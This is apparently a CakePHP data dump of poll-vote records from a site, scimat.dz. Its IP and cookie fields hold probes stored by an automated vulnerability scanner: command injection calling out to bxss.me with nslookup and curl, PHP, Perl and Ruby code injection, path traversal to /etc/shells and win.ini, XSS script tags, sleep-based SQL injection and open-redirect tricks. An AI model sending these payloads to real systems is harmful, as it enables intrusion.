'ip1' => '!(()&&!|*|*|',
'sondage_id' => '2'
),
(int) 6641 => array(
'id' => '7184',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6642 => array(
'id' => '7185',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6643 => array(
'id' => '7186',
'ip' => '85.190.233.47',
'ip1' => '^(#$!@#$)(()))******',
'sondage_id' => '2'
),
(int) 6644 => array(
'id' => '7187',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6645 => array(
'id' => '7188',
'ip' => 'https://scimat.dz/',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6646 => array(
'id' => '7189',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6647 => array(
'id' => '7190',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6648 => array(
'id' => '7191',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6649 => array(
'id' => '7192',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6650 => array(
'id' => '7193',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6651 => array(
'id' => '7194',
'ip' => 'https://scimat.dz/',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6652 => array(
'id' => '7195',
'ip' => '/etc/shells',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6653 => array(
'id' => '7196',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6654 => array(
'id' => '7197',
'ip' => 'https://bxss.me',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6655 => array(
'id' => '7198',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6656 => array(
'id' => '7199',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6657 => array(
'id' => '7200',
'ip' => 'c:/windows/win.ini',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6658 => array(
'id' => '7201',
'ip' => 'https://bxss.me/',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6659 => array(
'id' => '7202',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6660 => array(
'id' => '7203',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6661 => array(
'id' => '7204',
'ip' => '85.190.233.47',
'ip1' => 'echo ekwowh$()\ pooipk\nz^xyu||a #' &echo ekwowh$()\ pooipk\nz^xyu||a #|" &echo ekwowh$()\ pooipk\nz^xyu||a #',
'sondage_id' => '2'
),
(int) 6662 => array(
'id' => '7205',
'ip' => '85.190.233.47',
'ip1' => ''.gethostbyname(lc('hitqh'.'tyslgvlib7458.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(113).chr(86).chr(119).chr(75).'',
'sondage_id' => '2'
),
(int) 6663 => array(
'id' => '7206',
'ip' => 'bxss.me',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6664 => array(
'id' => '7207',
'ip' => '85.190.233.47',
'ip1' => '&echo dmloup$()\ jgixth\nz^xyu||a #' &echo dmloup$()\ jgixth\nz^xyu||a #|" &echo dmloup$()\ jgixth\nz^xyu||a #',
'sondage_id' => '2'
),
(int) 6665 => array(
'id' => '7208',
'ip' => '85.190.233.47',
'ip1' => '".gethostbyname(lc("hitqm"."ovnfvvpud2f59.bxss.me."))."A".chr(67).chr(hex("58")).chr(106).chr(81).chr(112).chr(72)."',
'sondage_id' => '2'
),
(int) 6666 => array(
'id' => '7209',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2&echo cvzowy$()\ pidkep\nz^xyu||a #' &echo cvzowy$()\ pidkep\nz^xyu||a #|" &echo cvzowy$()\ pidkep\nz^xyu||a #',
'sondage_id' => '2'
),
(int) 6667 => array(
'id' => '7210',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6668 => array(
'id' => '7211',
'ip' => '85.190.233.47',
'ip1' => 'HttP://bxss.me/t/xss.html?%00',
'sondage_id' => '2'
),
(int) 6669 => array(
'id' => '7212',
'ip' => 'https://bxss.me/\',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6670 => array(
'id' => '7213',
'ip' => '85.190.233.47',
'ip1' => 'gethostbyname(lc('hitkg'.'txccjgzl7b2e9.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(112).chr(67).chr(108).chr(87)',
'sondage_id' => '2'
),
(int) 6671 => array(
'id' => '7214',
'ip' => '85.190.233.47',
'ip1' => 'http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg',
'sondage_id' => '2'
),
(int) 6672 => array(
'id' => '7215',
'ip' => '85.190.233.47',
'ip1' => '|echo jldstq$()\ stdvek\nz^xyu||a #' |echo jldstq$()\ stdvek\nz^xyu||a #|" |echo jldstq$()\ stdvek\nz^xyu||a #',
'sondage_id' => '2'
),
(int) 6673 => array(
'id' => '7216',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6674 => array(
'id' => '7217',
'ip' => '85.190.233.47',
'ip1' => '1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg',
'sondage_id' => '2'
),
(int) 6675 => array(
'id' => '7218',
'ip' => ''"()',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6676 => array(
'id' => '7219',
'ip' => '85.190.233.47',
'ip1' => 'bxss.me/t/xss.html?%00',
'sondage_id' => '2'
),
(int) 6677 => array(
'id' => '7220',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2|echo gtzndi$()\ anroit\nz^xyu||a #' |echo gtzndi$()\ anroit\nz^xyu||a #|" |echo gtzndi$()\ anroit\nz^xyu||a #',
'sondage_id' => '2'
),
(int) 6678 => array(
'id' => '7221',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6679 => array(
'id' => '7222',
'ip' => '85.190.233.47',
'ip1' => 'Http://bxss.me/t/fit.txt',
'sondage_id' => '2'
),
(int) 6680 => array(
'id' => '7223',
'ip' => '85.190.233.47',
'ip1' => ')))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))',
'sondage_id' => '2'
),
(int) 6681 => array(
'id' => '7224',
'ip' => '85.190.233.47',
'ip1' => '(nslookup -q=cname hitvlaxuuxbrx13c9d.bxss.me||curl hitvlaxuuxbrx13c9d.bxss.me))',
'sondage_id' => '2'
),
(int) 6682 => array(
'id' => '7225',
'ip' => '85.190.233.47',
'ip1' => 'http://bxss.me/t/fit.txt%3F.jpg',
'sondage_id' => '2'
),
(int) 6683 => array(
'id' => '7226',
'ip' => '85.190.233.47',
'ip1' => '$(nslookup -q=cname hittshebhaaov56c10.bxss.me||curl hittshebhaaov56c10.bxss.me)',
'sondage_id' => '2'
),
(int) 6684 => array(
'id' => '7227',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6685 => array(
'id' => '7228',
'ip' => '85.190.233.47',
'ip1' => '/etc/shells',
'sondage_id' => '2'
),
(int) 6686 => array(
'id' => '7229',
'ip' => '85.190.233.47',
'ip1' => '&nslookup -q=cname hitwwabqnvvyt35ca8.bxss.me&'\"`0&nslookup -q=cname hitwwabqnvvyt35ca8.bxss.me&`'',
'sondage_id' => '2'
),
(int) 6687 => array(
'id' => '7230',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6688 => array(
'id' => '7231',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6689 => array(
'id' => '7232',
'ip' => '85.190.233.47',
'ip1' => '../../../../../../../../../../../../../../etc/shells',
'sondage_id' => '2'
),
(int) 6690 => array(
'id' => '7233',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6691 => array(
'id' => '7234',
'ip' => '85.190.233.47',
'ip1' => '&(nslookup -q=cname hitzuampaktpa1f839.bxss.me||curl hitzuampaktpa1f839.bxss.me)&'\"`0&(nslookup -q=cname hitzuampaktpa1f839.bxss.me||curl hitzuampaktpa1f839.bxss.me)&`'',
'sondage_id' => '2'
),
(int) 6692 => array(
'id' => '7235',
'ip' => '85.190.233.47',
'ip1' => '"+"A".concat(70-3).concat(22*4).concat(120).concat(86).concat(97).concat(86)+(require"socket"
Socket.gethostbyname("hitvw"+"vcazucaxd3c46.bxss.me.")[3].to_s)+"',
'sondage_id' => '2'
),
(int) 6693 => array(
'id' => '7236',
'ip' => '85.190.233.47',
'ip1' => 'c:/windows/win.ini',
'sondage_id' => '2'
),
(int) 6694 => array(
'id' => '7237',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6695 => array(
'id' => '7238',
'ip' => 'xfs.bxss.me',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6696 => array(
'id' => '7239',
'ip' => '85.190.233.47',
'ip1' => '|(nslookup -q=cname hitkuzchwkrng25785.bxss.me||curl hitkuzchwkrng25785.bxss.me)',
'sondage_id' => '2'
),
(int) 6697 => array(
'id' => '7240',
'ip' => '85.190.233.47',
'ip1' => 'bxss.me',
'sondage_id' => '2'
),
(int) 6698 => array(
'id' => '7241',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6699 => array(
'id' => '7242',
'ip' => '85.190.233.47',
'ip1' => ';assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));',
'sondage_id' => '2'
),
(int) 6700 => array(
'id' => '7243',
'ip' => '85.190.233.47',
'ip1' => ''+'A'.concat(70-3).concat(22*4).concat(105).concat(68).concat(101).concat(68)+(require'socket'
Socket.gethostbyname('hitdk'+'zvbtmckk4a60e.bxss.me.')[3].to_s)+'',
'sondage_id' => '2'
),
(int) 6701 => array(
'id' => '7244',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6702 => array(
'id' => '7245',
'ip' => '85.190.233.47',
'ip1' => 'xfs.bxss.me',
'sondage_id' => '2'
),
(int) 6703 => array(
'id' => '7246',
'ip' => '85.190.233.47',
'ip1' => '`(nslookup -q=cname hitenaildebos57590.bxss.me||curl hitenaildebos57590.bxss.me)`',
'sondage_id' => '2'
),
(int) 6704 => array(
'id' => '7247',
'ip' => ''"',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6705 => array(
'id' => '7248',
'ip' => '85.190.233.47',
'ip1' => ''A'.concat(70-3).concat(22*4).concat(120).concat(88).concat(114).concat(77)+(require'socket'
Socket.gethostbyname('hitnh'+'pmfmbmxtd5373.bxss.me.')[3].to_s)',
'sondage_id' => '2'
),
(int) 6706 => array(
'id' => '7249',
'ip' => '85.190.233.47',
'ip1' => '';print(md5(31337));$a='',
'sondage_id' => '2'
),
(int) 6707 => array(
'id' => '7250',
'ip' => '<!--',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6708 => array(
'id' => '7251',
'ip' => '85.190.233.47',
'ip1' => ';(nslookup -q=cname hitlhiuvhfakda9b32.bxss.me||curl hitlhiuvhfakda9b32.bxss.me)|(nslookup -q=cname hitlhiuvhfakda9b32.bxss.me||curl hitlhiuvhfakda9b32.bxss.me)&(nslookup -q=cname hitlhiuvhfakda9b32.bxss.me||curl hitlhiuvhfakda9b32.bxss.me)',
'sondage_id' => '2'
),
(int) 6709 => array(
'id' => '7252',
'ip' => '85.190.233.47',
'ip1' => '";print(md5(31337));$a="',
'sondage_id' => '2'
),
(int) 6710 => array(
'id' => '7253',
'ip' => '85.190.233.47',
'ip1' => ''"()',
'sondage_id' => '2'
),
(int) 6711 => array(
'id' => '7254',
'ip' => '85.190.233.47',
'ip1' => ''"',
'sondage_id' => '2'
),
(int) 6712 => array(
'id' => '7255',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6713 => array(
'id' => '7256',
'ip' => '85.190.233.47',
'ip1' => '|(nslookup${IFS}-q${IFS}cname${IFS}hitxixwtvitirf8f1e.bxss.me||curl${IFS}hitxixwtvitirf8f1e.bxss.me)',
'sondage_id' => '2'
),
(int) 6714 => array(
'id' => '7257',
'ip' => '85.190.233.47',
'ip1' => '${@print(md5(31337))}',
'sondage_id' => '2'
),
(int) 6715 => array(
'id' => '7258',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2'&&sleep(27*1000)*ecsdbc&&'',
'sondage_id' => '2'
),
(int) 6716 => array(
'id' => '7259',
'ip' => '85.190.233.47',
'ip1' => '<!--',
'sondage_id' => '2'
),
(int) 6717 => array(
'id' => '7260',
'ip' => '85.190.233.47',
'ip1' => '&(nslookup${IFS}-q${IFS}cname${IFS}hitjcylocbkoz37245.bxss.me||curl${IFS}hitjcylocbkoz37245.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitjcylocbkoz37245.bxss.me||curl${IFS}hitjcylocbkoz37245.bxss.me)&`'',
'sondage_id' => '2'
),
(int) 6718 => array(
'id' => '7261',
'ip' => '85.190.233.47',
'ip1' => '${@print(md5(31337))}\',
'sondage_id' => '2'
),
(int) 6719 => array(
'id' => '7262',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2"&&sleep(27*1000)*ymtygh&&"',
'sondage_id' => '2'
),
(int) 6720 => array(
'id' => '7263',
'ip' => '85.190.233.479101697',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6721 => array(
'id' => '7264',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2'||sleep(27*1000)*hvqlbi||'',
'sondage_id' => '2'
),
(int) 6722 => array(
'id' => '7265',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2"||sleep(27*1000)*gcynuh||"',
'sondage_id' => '2'
),
(int) 6723 => array(
'id' => '7266',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6724 => array(
'id' => '7267',
'ip' => '85.190.233.47',
'ip1' => ''.print(md5(31337)).'',
'sondage_id' => '2'
),
(int) 6725 => array(
'id' => '7268',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6726 => array(
'id' => '7269',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6727 => array(
'id' => '7270',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2'"()&%<zzz><ScRiPt >TQSe(9339)</ScRiPt>',
'sondage_id' => '2'
),
(int) 6728 => array(
'id' => '7271',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6729 => array(
'id' => '7272',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6730 => array(
'id' => '7273',
'ip' => '85.190.233.47',
'ip1' => ''"()&%<zzz><ScRiPt >TQSe(9534)</ScRiPt>',
'sondage_id' => '2'
),
(int) 6731 => array(
'id' => '7274',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6732 => array(
'id' => '7275',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6733 => array(
'id' => '7276',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6734 => array(
'id' => '7277',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6735 => array(
'id' => '7278',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6736 => array(
'id' => '7279',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6737 => array(
'id' => '7280',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe29524492',
'sondage_id' => '2'
),
(int) 6738 => array(
'id' => '7281',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6739 => array(
'id' => '7282',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6740 => array(
'id' => '7283',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6741 => array(
'id' => '7284',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6742 => array(
'id' => '7285',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6743 => array(
'id' => '7286',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6744 => array(
'id' => '7287',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6745 => array(
'id' => '7288',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6746 => array(
'id' => '7289',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6747 => array(
'id' => '7290',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6748 => array(
'id' => '7291',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6749 => array(
'id' => '7292',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6750 => array(
'id' => '7293',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6751 => array(
'id' => '7294',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6752 => array(
'id' => '7295',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6753 => array(
'id' => '7296',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6754 => array(
'id' => '7297',
'ip' => 'bxss.me',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6755 => array(
'id' => '7298',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6756 => array(
'id' => '7299',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6757 => array(
'id' => '7300',
'ip' => 'scimat.dz.bxss.me',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6758 => array(
'id' => '7301',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6759 => array(
'id' => '7302',
'ip' => 'scimat.dz@bxss.me',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6760 => array(
'id' => '7303',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6761 => array(
'id' => '7304',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6762 => array(
'id' => '7305',
'ip' => 'scimat.dz:80@bxss.me',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6763 => array(
'id' => '7306',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6764 => array(
'id' => '7307',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6765 => array(
'id' => '7308',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6766 => array(
'id' => '7309',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6767 => array(
'id' => '7310',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6768 => array(
'id' => '7311',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6769 => array(
'id' => '7312',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6770 => array(
'id' => '7313',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6771 => array(
'id' => '7314',
'ip' => 'bxss.me\@scimat.dz',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6772 => array(
'id' => '7315',
'ip' => 'bxss.me#scimat.dz',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6773 => array(
'id' => '7316',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6774 => array(
'id' => '7317',
'ip' => 'bxss.me?scimat.dz',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6775 => array(
'id' => '7318',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6776 => array(
'id' => '7319',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6777 => array(
'id' => '7320',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6778 => array(
'id' => '7321',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6779 => array(
'id' => '7322',
'ip' => '//bxss.me',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6780 => array(
'id' => '7323',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6781 => array(
'id' => '7324',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6782 => array(
'id' => '7325',
'ip' => '//scimat.dz.bxss.me',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6783 => array(
'id' => '7326',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6784 => array(
'id' => '7327',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6785 => array(
'id' => '7328',
'ip' => '//scimat.dz@bxss.me',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6786 => array(
'id' => '7329',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6787 => array(
'id' => '7330',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6788 => array(
'id' => '7331',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6789 => array(
'id' => '7332',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6790 => array(
'id' => '7333',
'ip' => '//bxss.me\@scimat.dz',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6791 => array(
'id' => '7334',
'ip' => '//bxss.me#scimat.dz',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6792 => array(
'id' => '7335',
'ip' => '//bxss.me?scimat.dz',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6793 => array(
'id' => '7336',
'ip' => 'http:bxss.me',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6794 => array(
'id' => '7337',
'ip' => 'http:bxss.me/',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6795 => array(
'id' => '7338',
'ip' => 'http:bxss.me/\',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6796 => array(
'id' => '7339',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6797 => array(
'id' => '7340',
'ip' => '85.190.233.47'"',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6798 => array(
'id' => '7341',
'ip' => '@@rZVhJ',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6799 => array(
